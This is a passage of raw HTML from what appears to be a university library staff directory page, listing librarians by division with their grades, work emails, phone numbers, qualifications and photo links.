class="elementor-element elementor-element-e3d198e elementor-widget elementor-widget-text-editor" data-id="e3d198e" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>nikzaleha@ukm.edu.my<br />03-89213594<br />MLIS (IIUM)<br />B.A (Hons) Islamic Revealed Knowledge & Heritage (IIUM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-a41f76f" data-id="a41f76f" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-1860967 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="1860967" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-ebc1d8d" data-id="ebc1d8d" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-1f7ead9 elementor-widget elementor-widget-image" data-id="1f7ead9" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="202" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2024/06/maria-202x300-1.jpg" class="attachment-medium size-medium wp-image-16097" alt="" /> </div> </div> <div class="elementor-element elementor-element-ce65c27 elementor-widget elementor-widget-heading" data-id="ce65c27" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Mariatul Qibtiah Isa </h3> </div> </div> <div class="elementor-element elementor-element-0ea0dfb elementor-widget elementor-widget-heading" data-id="0ea0dfb" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Senior Librarian (S44)</div> </div> </div> <div class="elementor-element elementor-element-575bd92 elementor-widget elementor-widget-text-editor" data-id="575bd92" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>mqi@ukm.edu.my<br />03-89214468<br />B.Sc. (Hons) Information Studies (UiTM) Records Management</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-d19d6eb" data-id="d19d6eb" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-b9cf2ec elementor-widget elementor-widget-image" data-id="b9cf2ec" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1940-200x300.jpg" class="attachment-medium size-medium wp-image-5412" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1940-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1940-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1940-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1940-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1940-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1940-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-9079f7f elementor-widget elementor-widget-heading" data-id="9079f7f" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">MOHAMMAD IZHAM BHARUDIN</h3> </div> </div> <div class="elementor-element elementor-element-8b8f254 elementor-widget elementor-widget-heading" data-id="8b8f254" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Librarian (S41)</div> </div> </div> <div class="elementor-element elementor-element-c9418ba elementor-widget elementor-widget-text-editor" data-id="c9418ba" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><a role="link" href="mailto:izhambharudin@ukm.edu.my" data-wahfont="14">izhambharudin@ukm.edu.my</a><br />03-89213269<br />B.Sc. (Hons) Information Library Management (UiTM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-655d76a" data-id="655d76a" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-33bfb30 elementor-widget elementor-widget-image" data-id="33bfb30" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2021/02/7H7A1794-200x300.jpg" class="attachment-medium size-medium wp-image-3692" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2021/02/7H7A1794-scaled-e1614136711879.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2021/02/7H7A1794-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2021/02/7H7A1794-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2021/02/7H7A1794-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2021/02/7H7A1794-1365x2048.jpg 1365w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-34cd52c elementor-widget elementor-widget-heading" data-id="34cd52c" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">NUR LIYANA ISMADHI</h3> </div> </div> <div class="elementor-element elementor-element-db408bb elementor-widget elementor-widget-heading" data-id="db408bb" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Librarian (S41)</div> </div> </div> <div class="elementor-element elementor-element-7b54c92 elementor-widget elementor-widget-text-editor" data-id="7b54c92" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><a href="mailto:liyanaismadhi@ukm.edu.my">liyanaismadhi@ukm.edu.my</a><br />03-89214468<br />MLS (UiTM)<br />B.Sc. (Hons) Information Studies (UiTM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-748645e" data-id="748645e" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-e515ad3 elementor-widget elementor-widget-image" data-id="e515ad3" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="218" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2023/03/lea-218x300.jpg" class="attachment-medium size-medium wp-image-12873" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2023/03/lea-218x300.jpg 218w, https://www.ukm.my/ptsl/wp-content/uploads/2023/03/lea.jpg 421w" sizes="(max-width: 218px) 100vw, 218px" /> </div> </div> <div class="elementor-element elementor-element-cb55e6b elementor-widget elementor-widget-heading" data-id="cb55e6b" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default"><span>NURUL LYLIA SABEELA JOHARI</span></h3> </div> </div> <div class="elementor-element elementor-element-05a9165 elementor-widget elementor-widget-heading" data-id="05a9165" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Librarian (S41)</div> </div> </div> <div class="elementor-element elementor-element-e3855e5 elementor-widget elementor-widget-text-editor" data-id="e3855e5" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">nuruliylia@ukm.edu.my</span><br /><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">03-89214733<br /></span><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">M.Sc. Info. Management (UiTM)</span><br /><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">B.Sc. (Hons) Information Studies Library & Information Management (UiTM)</span><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;"><br /></span></p> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-7fe45df elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="7fe45df" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-864f1f1" data-id="864f1f1" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-39433b8 elementor-widget elementor-widget-image" data-id="39433b8" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1955-200x300.jpg" class="attachment-medium size-medium wp-image-5413" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1955-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1955-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1955-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1955-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1955-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2021/06/7H7A1955-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-fc44ec8 elementor-widget elementor-widget-heading" data-id="fc44ec8" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">MD FAKRUL HISHAM MAHAMED</h3> </div> </div> <div class="elementor-element elementor-element-a28cd4c elementor-widget elementor-widget-heading" data-id="a28cd4c" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Assistant Librarian (S29)</div> </div> </div> <div class="elementor-element elementor-element-4144ba3 elementor-widget elementor-widget-text-editor" data-id="4144ba3" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><a href="mailto:fakrul@ukm.edu.my">fakrul@ukm.edu.my</a><br />03-8921 3563</p> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-e4d30fd elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="e4d30fd" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-e033f38" data-id="e033f38" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-0d9d1c1 elementor-widget elementor-widget-heading" data-id="0d9d1c1" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">INDEXING</h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-9254612 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="9254612" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-8a0e3fd" data-id="8a0e3fd" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-3e06e58" data-id="3e06e58" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-e790403 elementor-widget elementor-widget-image" data-id="e790403" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1801-200x300.jpg" class="attachment-medium size-medium wp-image-1166" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1801-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1801-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1801-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1801-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1801-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1801-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-8621e0b elementor-widget elementor-widget-heading" data-id="8621e0b" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Fatimah Kamilah Awang</h3> </div> </div> <div class="elementor-element elementor-element-437685c elementor-widget elementor-widget-heading" data-id="437685c" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Head Division (Senior Librarian) (S44)</div> </div> </div> <div class="elementor-element elementor-element-c370f0c elementor-widget elementor-widget-text-editor" data-id="c370f0c" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>kamilah@ukm.edu.my<br />03-89213145<br />B.Sc. (Hons) Information Studies (UiTM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-6dd5abb" data-id="6dd5abb" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-ffe9e70 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="ffe9e70" data-element_type="section" data-settings="{"background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-5097ec9" data-id="5097ec9" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-6eeeef8 elementor-widget elementor-widget-heading" data-id="6eeeef8" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">DEPARTMENT OF INFORMATION SERVICE MANAGEMENT</h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-dab648d elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="dab648d" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-7c404fc" data-id="7c404fc" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-19a1337 elementor-widget elementor-widget-heading" data-id="19a1337" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">CUSTOMER SERVICE</h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-c996238 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="c996238" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-20 elementor-inner-column elementor-element elementor-element-28cf55e" data-id="28cf55e" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-20 elementor-inner-column elementor-element elementor-element-09c513d" data-id="09c513d" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-29d448d elementor-widget elementor-widget-image" data-id="29d448d" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1585-200x300.jpg" class="attachment-medium size-medium wp-image-1176" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1585-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1585-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1585-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1585-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1585-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1585-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-b74329a elementor-widget elementor-widget-heading" data-id="b74329a" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default"><span>NIK SALIMAH NIK ABDULLAH</span></h3> </div> </div> <div class="elementor-element elementor-element-343845d elementor-widget elementor-widget-heading" data-id="343845d" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default"><span>Head Division (Assistant Chief Librarian) (S48)</span></div> </div> </div> <div class="elementor-element elementor-element-e89a1ed elementor-widget elementor-widget-text-editor" data-id="e89a1ed" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">niksal@ukm.edu.my</span><br /><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">03-89213865</span><br /><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">MLIS (IIUM)<br /></span><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">B.A (Hons) HSC in Arabic Language & Literature (IIUM)</span></p> </div> </div> </div> </div> <div class="elementor-column elementor-col-20 elementor-inner-column elementor-element elementor-element-f94e544" data-id="f94e544" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-641288e elementor-widget elementor-widget-image" data-id="641288e" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="191" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1638-191x300.jpg" class="attachment-medium size-medium wp-image-1159" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1638-191x300.jpg 191w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1638-654x1024.jpg 654w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1638-768x1203.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1638-980x1536.jpg 980w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1638-1307x2048.jpg 1307w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1638-scaled.jpg 1634w" sizes="(max-width: 191px) 100vw, 191px" /> </div> </div> <div class="elementor-element elementor-element-3c98ad4 elementor-widget elementor-widget-heading" data-id="3c98ad4" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Noor Farhana Mohd Saleh</h3> </div> </div> <div class="elementor-element elementor-element-c2fd913 elementor-widget elementor-widget-heading" data-id="c2fd913" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Senior Librarian (S44)</div> </div> </div> <div class="elementor-element elementor-element-39890b8 elementor-widget elementor-widget-text-editor" data-id="39890b8" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>farhana@ukm.edu.my<br />03-89215388<br /><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">MLIS (IIUM)</span><br /><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">B.A (Hons) Islamic Revealed Knowledge & Human Sciences (IIUM)</span></p> </div> </div> </div> </div> <div class="elementor-column elementor-col-20 elementor-inner-column elementor-element elementor-element-b032648" data-id="b032648" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-d2c5d77 elementor-widget elementor-widget-image" data-id="d2c5d77" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1566-200x300.jpg" class="attachment-medium size-medium wp-image-1162" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1566-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1566-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1566-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1566-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1566-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1566-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-48d1e05 elementor-widget elementor-widget-heading" data-id="48d1e05" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Nona Zurena Masenwat</h3> </div> </div> <div class="elementor-element elementor-element-7f36cbc elementor-widget elementor-widget-heading" data-id="7f36cbc" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Senior Librarian (S44)</div> </div> </div> <div class="elementor-element elementor-element-7308a68 elementor-widget elementor-widget-text-editor" data-id="7308a68" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>nonaz@ppukm.ukm.edu.my<br />03-89215021<br />MLIS (UM)<br />B.A (Hons) Human Development (UPM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-20 elementor-inner-column elementor-element elementor-element-36e2559" data-id="36e2559" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-4dec7f6 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="4dec7f6" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-657a9f9" data-id="657a9f9" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-8ce1874 elementor-widget elementor-widget-heading" data-id="8ce1874" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">RESEARCH SERVICE</h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-5e84c13 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="5e84c13" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-c23ef40" data-id="c23ef40" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-026d4c4 elementor-widget elementor-widget-image" data-id="026d4c4" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1593-200x300.jpg" class="attachment-medium size-medium wp-image-1231" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1593-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1593-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1593-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1593-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1593-1365x2048.jpg 1365w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1593-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-0c0a4b9 elementor-widget elementor-widget-heading" data-id="0c0a4b9" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h4 class="elementor-heading-title elementor-size-default">Ts. Md Hafiz Ahmad Zulkifli</h4> </div> </div> <div class="elementor-element elementor-element-d32d97b elementor-widget elementor-widget-heading" data-id="d32d97b" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default"><span>Head Division (Assistant Chief Librarian)</span> (S48)</div> </div> </div> <div class="elementor-element elementor-element-94b9249 elementor-widget elementor-widget-text-editor" data-id="94b9249" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>hafiz_az@ukm.edu.my<br />03-89213241<br />Master of Science in Information System Management (UiTM)<br />B.Sc. (Hons) Information Studies (UiTM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-63abc77" data-id="63abc77" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-8b8a3df elementor-widget elementor-widget-image" data-id="8b8a3df" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1613-200x300.jpg" class="attachment-medium size-medium wp-image-1158" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1613-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1613-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1613-768x1152.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1613-1024x1536.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1613-1366x2048.jpg 1366w, https://www.ukm.my/ptsl/wp-content/uploads/2020/10/7H7A1613-scaled.jpg 1707w" sizes="(max-width: 200px) 100vw, 200px" /> </div> </div> <div class="elementor-element elementor-element-000a81d elementor-widget elementor-widget-heading" data-id="000a81d" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Mohd Syamrooz Kamal Mhd. Redza</h3> </div> </div> <div class="elementor-element elementor-element-3591b97 elementor-widget elementor-widget-heading" data-id="3591b97" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Senior Librarian (S44)</div> </div> </div> <div class="elementor-element elementor-element-fa3f819 elementor-widget elementor-widget-text-editor" data-id="fa3f819" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>syamrooz@ukm.edu.my<br />03-89214747<br />B.Sc. (Hons) Information Studies (UiTM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-09e7f82" data-id="09e7f82" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-8eb72aa elementor-widget elementor-widget-image" data-id="8eb72aa" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="217" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2023/03/hamdani-217x300.jpg" class="attachment-medium size-medium wp-image-12874" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2023/03/hamdani-217x300.jpg 217w, https://www.ukm.my/ptsl/wp-content/uploads/2023/03/hamdani.jpg 419w" sizes="(max-width: 217px) 100vw, 217px" /> </div> </div> <div class="elementor-element elementor-element-13833b2 elementor-widget elementor-widget-heading" data-id="13833b2" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">Mohd Nur Hamdani bin Mohd Nor 'Azni</h3> </div> </div> <div class="elementor-element elementor-element-ea44bae elementor-widget elementor-widget-heading" data-id="ea44bae" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <div class="elementor-heading-title elementor-size-default">Librarian (S41)</div> </div> </div> <div class="elementor-element elementor-element-f395221 elementor-widget elementor-widget-text-editor" data-id="f395221" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span class="il">hamdani</span>@ukm.edu.my<br />03-89215848<br />B.Sc. (Hons) Information Library Management (UiTM)</p> </div> </div> </div> </div> <div class="elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-418eab8" data-id="418eab8" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-45d199c elementor-widget elementor-widget-image" data-id="45d199c" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img loading="lazy" decoding="async" width="200" height="300" src="https://www.ukm.my/ptsl/wp-content/uploads/2022/02/7H7A2856-crop-200x300.jpg" class="attachment-medium size-medium wp-image-8495" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2022/02/7H7A2856-crop-200x300.jpg 200w, https://www.ukm.my/ptsl/wp-content/uploads/2022/02/7H7A2856-crop-683x1024.jpg 683w, https://www.ukm.my/ptsl/wp-content/uploads/2022/02/7H7A2856-crop-768x1152.jpg 768w, 